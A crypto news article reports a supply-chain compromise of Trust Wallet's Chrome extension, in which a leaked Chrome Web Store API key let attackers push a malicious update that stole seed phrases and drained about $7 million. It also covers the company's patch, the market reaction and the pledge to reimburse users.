Trust Wallet’s Chrome extension has been compromised in a supply-chain attack that drained approximately $7 million from user wallets between December 24 and 26. The breach, confirmed by Trust Wallet and Binance founder Changpeng Zhao (CZ), exploited a leaked Chrome Web Store API key to push a malicious update (v2.68) to roughly 3,000 unsuspecting users.
The Mechanism: Leaked API Keys
The attack vector was not a smart contract failure or a phishing link, but a corruption of the update pipeline itself. According to Trust Wallet CEO Eowyn Chen, attackers utilized a leaked API key to bypass the company’s internal review process and publish version 2.68 directly to the Chrome Web Store.
Once installed, the compromised extension executed a script that harvested mnemonic seed phrases and transmitted them to an attacker-controlled domain, api.metrics-trustwallet.com. The malicious code specifically targeted high-value assets across Bitcoin, Ethereum, and Solana chains. Trust Wallet has since patched the vulnerability in version 2.69 and revoked the compromised API credentials.
The malicious extension v2.68 was NOT released through our internal manual process. Our findings suggest it was published externally through a leaked Chrome Web Store API key.
Supply Chain Vulnerability
This incident appears to be a downstream effect of the larger “Shai-Hulud” supply chain attack from November, which exposed developer GitHub secrets across the industry. Security firms noted that the attackers waited nearly a month before leveraging the stolen credentials to launch the Christmas Eve assault.
Market Reaction & Reimbursement
Despite the severity of the breach, Trust Wallet Token (TWT) showed resilience, trading at $0.93 (-0.7%) as the market digested the news. The muted price action is likely attributed to CZ’s rapid intervention; the Binance founder confirmed on X (formerly Twitter) that Trust Wallet would cover the entire $7 million loss, stating, “User funds are SAFU.”
The company is currently finalizing a claims process for the ~2,500 affected wallet addresses.
